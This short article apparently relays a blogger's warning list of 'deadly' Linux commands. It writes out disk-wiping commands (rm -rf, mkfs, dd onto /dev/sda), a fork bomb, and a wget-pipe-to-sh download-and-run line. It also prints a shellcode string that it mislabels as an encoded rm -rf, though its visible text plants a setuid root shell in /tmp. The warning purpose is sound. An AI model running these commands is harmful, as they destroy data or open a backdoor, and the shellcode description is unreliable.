Seven Deadliest Linux Commands

Auza warns new forum and chat participants not to fall into the trap of calling each other "dumbheads."

CAUTION! All commands included in the blog and that appear here actually destroy a complete Linux system. Those wishing to try them should do so on a separate, virtual machine. Please proceed at your own risk!

The first, classic deadly command is certainly:

rm -rf/

The command starts at root and will forcefully delete all files recursively. The result: the hard disk and all relevant files are wiped out.

A corollary to the first deadly command is its hex equivalent:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

According to Auza, this encrypted version of rm -rf/ can "deceive even the rather experienced Linux users."

A deletion that might proceed somewhat faster than a complete hard disk wipeout is:

mkfs.ext3 /dev/sda

The command will do horrible things to sda.

If losing data were bad enough, consider this command:

:(){:|:&};:

It executes enough processes to freeze your system and completely corrupt your data. It is also known as the "forkbomb." Should you use the command in a startup script, at least a system message will mitigate the effect.

Back to the hard disk, with this command:

any_command > /dev/sda

The any_command can be for a favorite program that might output some terminal data, but in this case it writes it to the sda hard disk. As a rule, all data will span partitions and the entire filesystem will cross the River Styx.

Even Linux has so-called rootkits, malware that takes control of root and transforms the PC into an unwilling zombie. All you need is some_untrusted_source on the Web and use wget on it:

wget http:// some_untrusted_source -O- | sh

The command certainly invites trouble from the untrusted URL in the way of possible rootkits with malicious code.

The last of the seven deadliest commands Auza calls the /dev/null trick:

mv /home/my_home_directory/* /dev/null

Everything you move to /dev/null, such as your favorite home directory, will end up in the Big Garbage Heap.

As the responses to the blog steadily grow, many additional ways to destroy your Linux system are beginning to emerge. A prominent one is:

dd if=/dev/urandom of=/dev/sda

This fills the sda disk with random numbers. Oh joy!

Users should be especially wary of requests involving root privileges, the rm -rf or dd commands, redirection (via "|" and ">"), or using a hard disk (such as /dev/sda) as a parameter.